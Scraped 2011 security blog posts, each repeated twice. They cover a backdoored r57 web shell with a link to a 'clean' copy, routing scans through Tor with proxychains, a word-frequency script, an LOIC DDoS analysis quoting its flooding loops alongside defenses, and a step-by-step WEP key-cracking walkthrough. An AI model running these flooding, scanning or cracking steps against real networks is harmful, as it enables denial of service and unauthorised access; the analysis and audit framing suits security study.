The r57 shell (and others) at http://www.xfocus.net.ru/soft/r57.txt has a backdoor.
Clean copy can be found here:
http://pastebin.com/G6W8qqmv
Enjoy.
See original source for base 64 encoded variables, containing javascript back doors. These have been cleaned up in the pastebin above..
Computer Biology
Thursday, October 20, 2011
Saturday, September 17, 2011
Tor Proxy and Proxychains = Anonymous Internet Operations
The Tor network is an onion routing project that allows users to send traffic through the network, thus making your Internet traffic appear to come from the Tor exit node, not your real IP.
This article will show you how to use torproxy to tunnel to a Tor exit node, bypassing the rest of the s-l-o-w Tor network, and then use proxychains so that your applications can use this tunnel, and your public IP will appear to be that of the Tor exit node.
First we need to get the required applications installed.
Install
I will be using Ubuntu 11.04. You will also need to install:
From terminal:
See notes below if you cant get Boost libraries installed.
Next, download and save tortunnel:
http://www.thoughtcrime.org/software/tortunnel/
Back to terminal, then extract and install...
Watch the install screen and make sure it all goes well. To confirm torproxy is working type:
You should get a response:
Configure
Now that everything is installed, we need to configure privoxy and proxychains so that they work with torproxy.
Configure proxychains.
Comment out the last line with a # and add the line below:
Configure privoxy
Find the line that says "forward-socks5" and change it to look like this (including the period):
Configure torproxy
To connect to an exit node we first need to find exit node IP.
From the tortunnel website they provide a directory of Tor routers. Look in the directory for a router that has the properties: "Fast" "Exit" and "Valid"
Once you find an exit node IP, run torproxy using that IP, and put an & at the end of the command to start it as a backround job.
You should see a result like this:
Use tunnel
Once you see the line "Connected to Exit Node. SOCKS proxy ready on 5060" we can start pushing traffic through that socket.
We configured proxychains to forward traffic to port 5060. To use command line tools use the following syntax:
proxychains telnet google.com 80
proxychains ssh user@example.com
proxychains nmap 100.200.100.10
Or you can configure Firefox to run through the Tor exit proxy. Click
Edit > Preferences > Network > Settings
Set proxy to "Manual proxy configuration" and specify 127.0.0.1 5060 as Firefox's SOCKS proxy - this will push all firefox traffic trough the Tor exit node. Confirm this by checking whatismyip.com - it should be the same IP as the exit node you chose.
Notes
You may need to download the Boost C++ libraries directly from their website or SourceForge and install it manually. The release package will have detailed install instructions.
Computer Biology
This article will show you how to use torproxy to tunnel to a Tor exit node, bypassing the rest of the s-l-o-w Tor network, and then use proxychains so that your applications can use this tunnel, and your public IP will appear to be that of the Tor exit node.
First we need to get the required applications installed.
Install
I will be using Ubuntu 11.04. You will also need to install:
proxychains
privoxy
tortunnel (contains torproxy, requires boost libraries)
Boost C++ Libraries
From terminal:
sudo apt-get install proxychains privoxy libboost-all-dev
See notes below if you cant get Boost libraries installed.
Next, download and save tortunnel:
http://www.thoughtcrime.org/software/tortunnel/
Back to terminal, then extract and install...
tar -xf tortunnel-0.2.tar.gz
cd tortunnel-0.2
./configure; make;
Watch the install screen and make sure it all goes well. To confirm torproxy is working type:
./torproxy
You should get a response:
Usage: ./torproxy <ExitNodeIP>
Configure
Now that everything is installed, we need to configure privoxy and proxychains so that they work with torproxy.
Configure proxychains.
sudo gedit /etc/proxychains.conf
Comment out the last line with a # and add the line below:
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 5060
Configure privoxy
sudo gedit /etc/privoxy/config
Find the line that says "forward-socks5" and change it to look like this (including the period):
# To chain Privoxy and Tor, both running on the same system,
# you would use something like:
#
forward-socks5 / 127.0.0.1:5060 .
#
Configure torproxy
To connect to an exit node we first need to find exit node IP.
From the tortunnel website they provide a directory of Tor routers. Look in the directory for a router that has the properties: "Fast" "Exit" and "Valid"
A directory of Tor routers is located here:
http://128.31.0.34:9031/tor/status/all
Once you find an exit node IP, run torproxy using that IP, and put an & at the end of the command to start it as a backround job.
./torproxy <ExitNodeIP> &
You should see a result like this:
./torproxy 173.254.192.37
torproxy 0.2 by Moxie Marlinspike.
Retrieving directory listing...
Connecting to exit node: 173.254.192.37:443
SSL Connection to node complete. Setting up circuit.
Connected to Exit Node. SOCKS proxy ready on 5060.
Use tunnel
Once you see the line "Connected to Exit Node. SOCKS proxy ready on 5060" we can start pushing traffic through that socket.
We configured proxychains to forward traffic to port 5060. To use command line tools use the following syntax:
proxychains telnet google.com 80
proxychains ssh user@example.com
proxychains nmap 100.200.100.10
Or you can configure Firefox to run through the Tor exit proxy. Click
Edit > Preferences > Network > Settings
Set proxy to "Manual proxy configuration" and specify 127.0.0.1 5060 as Firefox's SOCKS proxy - this will push all firefox traffic trough the Tor exit node. Confirm this by checking whatismyip.com - it should be the same IP as the exit node you chose.
Notes
You may need to download the Boost C++ libraries directly from their website or SourceForge and install it manually. The release package will have detailed install instructions.
Computer Biology
Tuesday, July 5, 2011
Word Frequency Analysis
Simple Bash script used to determine the frequency of words in a text file called "mydatafile".
Line by line walk through of the above script:
First, cat the text file to the standard output and pipe into a few tr commands.
The first tr removes any punctuation and output piped into a second tr which removes the numbers and the output is piped into a third tr command that places every word (group of letters separated by a ' ' ) on a new line.
The output is run through a sort command, arranging the words in a sorted list and the output is piped into a uniq -c command that counts the unique words outputting two columns; the count and the word, which is piped into a sort -n to sort the list ascending order of words.
The last line cuts the list to only display the top 700 most frequent words.
#!/bin/sh
cat mydatafile \
| tr '[:punct:]' ' ' \
| tr '[:digit:]' ' ' \
| tr ' ' '\012' \
| sort \
| uniq -c \
| sort -n \
| tail -700
Line by line walk through of the above script:
First, cat the text file to the standard output and pipe into a few tr commands.
The first tr removes any punctuation and output piped into a second tr which removes the numbers and the output is piped into a third tr command that places every word (group of letters separated by a ' ' ) on a new line.
The output is run through a sort command, arranging the words in a sorted list and the output is piped into a uniq -c command that counts the unique words outputting two columns; the count and the word, which is piped into a sort -n to sort the list ascending order of words.
The last line cuts the list to only display the top 700 most frequent words.
Tuesday, March 8, 2011
Low Orbit Ion Cannon (LOIC) Analysis
The Primordial Weapon of Cyberwar
The LOIC is a readily available, open-source application used in DDoS attacks; most notably used in the 'Anonymous' attacks against Visa, MasterCard and WordPress. Read more about LOIC attacks here.
Once a willing participant hands control over to the IRC channel, LOIC blasts away at a web server, using a loop of HTTP GET requests, TCP connections, and or UDP connections. One person using this application is not enough to bring down a web server, as the server should handle these requests; its when thousands of people use the tool to overwhelm the server that the DoS actually occurs.
See the links section at the end of this post if you want to read more about the attacks and the 'group' labeled Anonymous.
A screen shot of the original LOIC v.1.0.0.0 written by Praetox - Note, this early version does not have the remote IRC control feature.
v.1.1.1.16 - The remote control over IRC feature allows individuals to participate and use their home bandwidth in an attack with no prior 'hacking' knowledge.
The Source
There are two different LOIC's that are popularly downloaded. There are many variants in the wild but all are based on the original code in C#. LOIC has been ported to other languages including Java and JavaScript.
LOIC v.1.0.4
Developed by abatishchev - http://sourceforge.net/projects/loic/
LOIC v.1.1.3
Developed by NewEraCracker - https://github.com/NewEraCracker/LOIC/
Each version has two main modules that do most of the 'work' in the aplication.
HTTPFlooder.cs
XXPFlooder.cs
As the names imply, these are the two different methods LOIC uses to flood the web server with traffic.
Looking at the source, we can actually see what is happening and the difference between the two popular versions.
LOIC v.1.0.4 (SourceForge.com)
HTTPFlooder.cs
The buf variable is simply the text sent to a web server to make a legitimate request for a document on that server. When placed in the loop this seemingly innocent request starts to get not-so-innocent. One person using this is a load-testing tool but a few hundred people can cause some damage if they all point at one server.
XXPFlooder.cs
The first flooding method besides HTTP requests, is the TCP connection, sending random message/data through a TCP connection, again not-so-innocently placed inside a while loop. The other flooding option is creating a UDP connection. The screen shots show a text input field where a user can specify the text they wish to send through the socket.
LOIC v.1.1.3 (GitHub.com)
HTTPFlooder.cs
The updated version performs the same HTTP GET request but this time is spoofs browser headers (Mozilla/4.0(Compatible; MSIE 7.0 Windows NT 6.0), sends a random string as part of the request, allows GZip compression, and as usual you need to end the request with a few Enter keystrokes (Environment.NewLine) just like when you telnet into a web server to make the request manually.
Defend your network from a LOIC attack
Proxies and Tor can't be used in this type of attack because the DoS traffic will overwhelm the proxy or Tor network. This attack exposes the client IP address, as if they were making thousands of legitimate requests. If you are attacked with a DDoS, log every connection attempt that you possibly can.
Defense against this type of DDoS attack include:
- Limit the number of requests per IP address per second.
http://www.cyberciti.biz/tips/lighttpd-set-throughput-connections-per-ip.html
- Use firewalls that support layer 7 HTTP inspection.
http://www.cisco.com/en/US/docs/ios_xr_sw/iosxr_r3.5/vfw/configuration/guide/vfc35int.html
- Ingress Filtering
http://en.wikipedia.org/wiki/Ingress_filtering
Stats
LOIC on GitHub - pageview traffic from Dec 2010 to present (Mar 2011) Yes, thats 35K page views in Dec 2010. Operation Avenge Assange was launched in Dec 2010, targeting PayPal, Visa, MasterCard and the Swedish Prosecution Authority. The traffic appears to have fallen off since then.
Have a look at download statistics for LOIC hosted on SourceForge. Top downloading country: the United States, top OS: Windows. Its staggering that this is an opt-in, point-and-click attack and the source seems to be concentrated in the United States.
http://sourceforge.net/projects/loic/files/loic/stats/map
http://sourceforge.net/projects/loic/files/loic/stats/timeline
Links
- LOIC DDoS Analysis, Wireshark and Snort
http://blog.spiderlabs.com/2011/01/loic-ddos-analysis-and-detection.html
- Operation Payback used LOIC
http://en.wikipedia.org/wiki/Operation_Payback#Tools_and_communication
- DACS Paper on LOIC & Anonymous
http://www.simpleweb.org/reports/loic-report.pdf
- WordPress attacked by LOIC
http://www.eweek.com/c/a/Security/WordPresscom-Hit-by-Extremely-Large-Denial-of-Service-Attack-618818/
- More about LOIC
http://www.p2pnet.net/story/49690
Computer Biology
The LOIC is a readily available, open-source application used in DDoS attacks; most notably used in the 'Anonymous' attacks against Visa, MasterCard and WordPress. Read more about LOIC attacks here.
"It's true that most of the operations performed under the Anonymous branding have been relatively unsophisticated, albeit effective: the attacks made on MasterCard and others were distributed denial-of-service attacks using a modified version of the Low Orbit Ion Cannon (LOIC) load-testing tool. The modified LOIC enables the creation of large botnets that each user opts into: the software can be configured to take its instructions from connections to Internet relay chat (IRC) chat servers, allowing attack organizers to remotely control hundreds of slave machines and hence control large-scale attacks that can readily knock websites offline."
(Arstechnica.com)
Once a willing participant hands control over to the IRC channel, LOIC blasts away at a web server, using a loop of HTTP GET requests, TCP connections, and or UDP connections. One person using this application is not enough to bring down a web server, as the server should handle these requests; its when thousands of people use the tool to overwhelm the server that the DoS actually occurs.
See the links section at the end of this post if you want to read more about the attacks and the 'group' labeled Anonymous.
The Source
There are two different LOIC's that are popularly downloaded. There are many variants in the wild but all are based on the original code in C#. LOIC has been ported to other languages including Java and JavaScript.
LOIC v.1.0.4
Developed by abatishchev - http://sourceforge.net/projects/loic/
LOIC v.1.1.3
Developed by NewEraCracker - https://github.com/NewEraCracker/LOIC/
Each version has two main modules that do most of the 'work' in the aplication.
HTTPFlooder.cs
XXPFlooder.cs
As the names imply, these are the two different methods LOIC uses to flood the web server with traffic.
Looking at the source, we can actually see what is happening and the difference between the two popular versions.
LOIC v.1.0.4 (SourceForge.com)
HTTPFlooder.cs
[...]
byte[] buf = System.Text.Encoding.ASCII.GetBytes(String.Format("GET {0} HTTP/1.0{1}{1}{1}", Subsite, Environment.NewLine));
[...]
socket.Send(buf, SocketFlags.None);These lines, neatly wrapped in a While loop, create a variable called buf and send that variable through a socket.
The buf variable is simply the text sent to a web server to make a legitimate request for a document on that server. When placed in the loop this seemingly innocent request starts to get not-so-innocent. One person using this is a load-testing tool but a few hundred people can cause some damage if they all point at one server.
XXPFlooder.cs
byte[] buf = System.Text.Encoding.ASCII.GetBytes(Data);
[...]
socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket.Connect(RHost);
[...]
while (IsFlooding)
socket.Send(buf);
[...]
socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
while (IsFlooding)
socket.SendTo(buf, SocketFlags.None, RHost);
The first flooding method besides HTTP requests, is the TCP connection, sending random message/data through a TCP connection, again not-so-innocently placed inside a while loop. The other flooding option is creating a UDP connection. The screen shots show a text input field where a user can specify the text they wish to send through the socket.
LOIC v.1.1.3 (GitHub.com)
HTTPFlooder.cs
byte[] buf = System.Text.Encoding.ASCII.GetBytes(String.Format("GET {0}{1} HTTP/1.1{4}Accept: */*{4}User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0){4}{3}Host: {2}{4}{4}{4}", Subsite, ( AllowRandom ? new Functions().RandomString() : null ), Host, (AllowGzip ? "Accept-Encoding: gzip, deflate"+Environment.NewLine : null), Environment.NewLine));
IPEndPoint RHost = new IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
The updated version performs the same HTTP GET request but this time is spoofs browser headers (Mozilla/4.0(Compatible; MSIE 7.0 Windows NT 6.0), sends a random string as part of the request, allows GZip compression, and as usual you need to end the request with a few Enter keystrokes (Environment.NewLine) just like when you telnet into a web server to make the request manually.
XXPFlooder.cs
socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream,ProtocolType.Tcp);The XXPFlooder is practically the same, except this version concatenates the user input text message with a random string and sends that through either a TCP or UDP connection.
or
socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
[...]
while (IsFlooding)
buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? new Functions().RandomString() : null) ));
socket.SendTo(buf, SocketFlags.None, RHost);
Defend your network from a LOIC attack
Proxies and Tor can't be used in this type of attack because the DoS traffic will overwhelm the proxy or Tor network. This attack exposes the client IP address, as if they were making thousands of legitimate requests. If you are attacked with a DDoS, log every connection attempt that you possibly can.
Defense against this type of DDoS attack include:
- Limit the number of requests per IP address per second.
http://www.cyberciti.biz/tips/lighttpd-set-throughput-connections-per-ip.html
- Use firewalls that support layer 7 HTTP inspection.
http://www.cisco.com/en/US/docs/ios_xr_sw/iosxr_r3.5/vfw/configuration/guide/vfc35int.html
- Ingress Filtering
http://en.wikipedia.org/wiki/Ingress_filtering
Stats
LOIC on GitHub - pageview traffic from Dec 2010 to present (Mar 2011) Yes, thats 35K page views in Dec 2010. Operation Avenge Assange was launched in Dec 2010, targeting PayPal, Visa, MasterCard and the Swedish Prosecution Authority. The traffic appears to have fallen off since then.
Have a look at download statistics for LOIC hosted on SourceForge. Top downloading country: the United States, top OS: Windows. Its staggering that this is an opt-in, point-and-click attack and the source seems to be concentrated in the United States.
http://sourceforge.net/projects/loic/files/loic/stats/map
http://sourceforge.net/projects/loic/files/loic/stats/timeline
Links
- LOIC DDoS Analysis, Wireshark and Snort
http://blog.spiderlabs.com/2011/01/loic-ddos-analysis-and-detection.html
- Operation Payback used LOIC
http://en.wikipedia.org/wiki/Operation_Payback#Tools_and_communication
- DACS Paper on LOIC & Anonymous
http://www.simpleweb.org/reports/loic-report.pdf
- WordPress attacked by LOIC
http://www.eweek.com/c/a/Security/WordPresscom-Hit-by-Extremely-Large-Denial-of-Service-Attack-618818/
- More about LOIC
http://www.p2pnet.net/story/49690
Computer Biology
Wednesday, January 26, 2011
802.11 WEP Wireless Hacking
Introduction to WEP and the IV vulnerability
Wired Equivalent Privacy (WEP) is a wireless security protocol, providing both encryption and authentication.
The encryption method used is RSA's RC4 stream cipher. The RC4 algorithm operates on a 'seed' consisting of an initialization vector (IV) and a secret shared key to create a keystream which is XORed with plaintext to create ciphertext.
When connecting to a WEP secured network you are asked for the secret shared key which is used to authenticate clients to the network and also encrypt the traffic.
The vulnerability in the WEP protocol is the transit of the IV in plaintext. This allows an attacker to eavesdrop on wireless traffic and collect enough IVs to bruteforce the secret shared authentication key. Once the key is obtained the attacker uses it to connect to the target wireless network.
Cracking a WEP Key
The purpose of this article is for education and security auditing only. Anyone using this for any other reason are liable for their own actions.
To see this vulnerability work and to actually crack a WEP key in a test environment you need some tools.
Assuming the wireless interface is wlan0, disable the interface.
Use macchanger to change the MAC address of the wlan0 interface.
Bring the wlan0 interface back up.
Use airmon to create a monitor mode interface for wlan0. The new monitoring interface is called mon0.
Run airodump to observe target networks and gather MAC (BSSID), channel and ESSID.
Run airodump again this time specifying the target channel, BSSID, and file to dump the output to. This step is where the IVs are collected for analysis later. Again, since this is a passive attack it may take a while to collect enough IVs. Leave the machine on overnight collecting data if needed.
Keep an eye on the above command. One column is called #Data. This is the actual number of IVs collected from the network. If there is no traffic on the network this number will slowly increase. Once you have about 20,000 IVs, run the following command.
aircrack will report back if it has successfully cracked the WEP key or if you need to continue to collect more IVs and try again. The number of IVs needed to crack a key varies, but it can be done in less than 20,000 IVs.
Enjoy.
Wired Equivalent Privacy (WEP) is a wireless security protocol, providing both encryption and authentication.
The encryption method used is RSA's RC4 stream cipher. The RC4 algorithm operates on a 'seed' consisting of an initialization vector (IV) and a secret shared key to create a keystream which is XORed with plaintext to create ciphertext.
When connecting to a WEP secured network you are asked for the secret shared key which is used to authenticate clients to the network and also encrypt the traffic.
The vulnerability in the WEP protocol is the transit of the IV in plaintext. This allows an attacker to eavesdrop on wireless traffic and collect enough IVs to bruteforce the secret shared authentication key. Once the key is obtained the attacker uses it to connect to the target wireless network.
Note: A standard WEP implementation uses a 40 bit key and a 24 bit IV, resulting in a 64 bit keystream. Because of this, WEP is sometimes referred to as 40 bit WEP or 64 bit WEP.
Cracking a WEP Key
The purpose of this article is for education and security auditing only. Anyone using this for any other reason are liable for their own actions.
To see this vulnerability work and to actually crack a WEP key in a test environment you need some tools.
- A test network using an 802.11 wireless router with WEP enabled and a 40 bit key created.
- A linux machine with a wireless card. In this example Back Track 4 r2 is the operating system used. Download a live DVD if you don't have a dedicated machine.
- macchanger, airmon-ng, airdump-ng, and aircrack-ng. These tools are all included in Back Track 4.
Assuming the wireless interface is wlan0, disable the interface.
ifconfig wlan0 down
Use macchanger to change the MAC address of the wlan0 interface.
macchanger --mac 00:11:22:33:44:55 wlan0
Bring the wlan0 interface back up.
ifconfig wlan0 up
Use airmon to create a monitor mode interface for wlan0. The new monitoring interface is called mon0.
airmon-ng start wlan0
Run airodump to observe target networks and gather MAC (BSSID), channel and ESSID.
airodump-ng mon0
Run airodump again this time specifying the target channel, BSSID, and file to dump the output to. This step is where the IVs are collected for analysis later. Again, since this is a passive attack it may take a while to collect enough IVs. Leave the machine on overnight collecting data if needed.
airodump-ng --ivs-w /root/dumpfile --bssid mon0
Keep an eye on the above command. One column is called #Data. This is the actual number of IVs collected from the network. If there is no traffic on the network this number will slowly increase. Once you have about 20,000 IVs, run the following command.
aircrack-ng /root/dumpfile.cap
aircrack will report back if it has successfully cracked the WEP key or if you need to continue to collect more IVs and try again. The number of IVs needed to crack a key varies, but it can be done in less than 20,000 IVs.
Enjoy.
Subscribe to:
Posts (Atom)